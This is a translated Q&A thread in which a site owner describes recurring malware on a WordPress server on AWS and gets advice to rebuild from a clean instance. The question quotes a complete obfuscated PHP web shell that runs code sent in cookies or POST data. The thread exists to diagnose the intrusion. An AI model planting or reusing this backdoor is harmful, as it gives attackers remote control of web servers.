-3

我们的 aws(托管 Wordpress 和自己的应用程序)实例上有一些恶意软件正在做奇怪的事情:

  • chmod 755 /var/www/html 独立于以前的情况

  • 将index.html复制到index.html.bak.bak并删除index.html 当我在 index.html 上运行 ausearch 时,我被定向到由我们的应用程序管理的文件夹,该文件夹包含一个带有 randomname.php 的对象,例如 mqnwtxzg.php。此类 php 文件的内容:

    $wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();$lcxtas[] = $wezhgja[2].$wezhgja[6].$wezhgja[2].$wezhgja[21].$wezhgja[27].$wezhgja[18].$wezhgja[11].$wezhgja[27].$wezhgja[9].$wezhgja[27].$wezhgja[24].$wezhgja[25].$wezhgja[2].$wezhgja[9].$wezhgja[25].$wezhgja[21].$wezhgja[13].$wezhgja[11].$wezhgja[9].$wezhgja[13].$wezhgja[7].$wezhgja[27].$wezhgja[12].$wezhgja[9].$wezhgja[24].$wezhgja[16].$wezhgja[18].$wezhgja[21].$wezhgja[24].$wezhgja[18].$wezhgja[18].$wezhgja[2].$wezhgja[25].$wezhgja[18].$wezhgja[24].$wezhgja[2];$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29].$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2].$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];$lcxtas[] = $wezhgja[33].$wezhgja[30];$lcxtas[] = $wezhgja[31];$lcxtas[] = $wezhgja[2].$wezhgja[32].$wezhgja[17].$wezhgja[1].$wezhgja[29];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[5].$wezhgja[4].$wezhgja[34].$wezhgja[23].$wezhgja[34].$wezhgja[12].$wezhgja[29];$lcxtas[] = $wezhgja[34].$wezhgja[19].$wezhgja[23].$wezhgja[15].$wezhgja[32].$wezhgja[26].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[17].$wezhgja[18].$wezhgja[3].$wezhgja[29].$wezhgja[4];$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8].$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[15].$wezhgja[34].$wezhgja[1];$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){function irgndu($lcxtas, $tlfwyg, $zskgpvt){return $lcxtas[7]($lcxtas[5]($tlfwyg . $lcxtas[0], ($zskgpvt / $lcxtas[9]($tlfwyg)) + 1), 0, $zskgpvt);}function fpdyn($lcxtas, $eklrh){return @$lcxtas[10]($lcxtas[2], $eklrh);}function zmychft($lcxtas, $eklrh){$rugfslb = $lcxtas[4]($eklrh) % 3;if (!$rugfslb) {$zttttc = $lcxtas[1]; $tdber = $zttttc("", $eklrh[1]($eklrh[2]));$tdber();exit();}}$bdxjqs = fpdyn($lcxtas, $bdxjqs);zmychft($lcxtas, $lcxtas[6]($lcxtas[3], $bdxjqs ^ irgndu($lcxtas, $tlfwyg, $lcxtas[9]($bdxjqs))));}

  • 在另一个随机文件夹中,我找到了这样的对象:/somefolder/.5d45a5b3.ico

我们会定期检查这些东西并删除所有这些奇怪的对象,但大约一天后,它们又回来了。唯一改变的是奇怪的对象现在有不同的名称并被放置在不同的文件夹中。

我们正在我们的系统上运行恶意软件扫描,它们会检测到这些对象,但到目前为止,没有什么能阻止它们回来。

有没有人遇到过类似的问题,有人可以推荐任何东西来摆脱这些东西吗?

任何人都可以指导我们找到可以提供帮助的人,即使该服务是可以支付的?

4

1 回答 1

0

而不是修复症状,您应该将注意力集中在确保您的 Wordpress 安装是最新版本并将任何插件更新到最新版本上。考虑到当前系统已被入侵,请勿尝试“打补丁”。它很可能是后门的。不要相信它。而是备份数据(例如数据库)并使用最新版本在新实例上重建 wordpress 站点。

看看https://wordpress.org/support/article/faq-my-site-was-hacked/https://wordpress.org/support/article/hardening-wordpress/

于 2019-10-22T13:54:24.270 回答